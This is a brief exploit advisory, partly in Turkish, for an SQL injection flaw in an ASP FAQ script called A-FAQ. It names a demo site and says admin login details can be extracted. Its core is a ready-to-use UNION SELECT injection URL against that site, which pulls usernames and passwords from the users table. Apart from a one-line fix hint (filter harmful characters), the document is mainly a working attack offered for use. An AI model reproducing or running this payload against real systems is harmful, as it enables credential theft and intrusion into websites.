< ------------------- header data start ------------------- >

#############################################################

# author : Trk_komando

# Script Name : A-FAQ

# Bug Type : Sql Injection

# Infection : Admin giris bilgileri alinabilir.

# Demo Vuln. :http://www.alanward.net/afaq1_0/faqDsp.asp?catcode=10

# Bug Fix Advice : Zararli karakterler filtrelenmelidir.


#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

http://www.alanward.net/afaq1_0/faqDsp.asp?catcode=10+union+select+0,username,2,3,4,5,6,7,8,9,10,11,password,13+from+users


< -- bug code end of -- >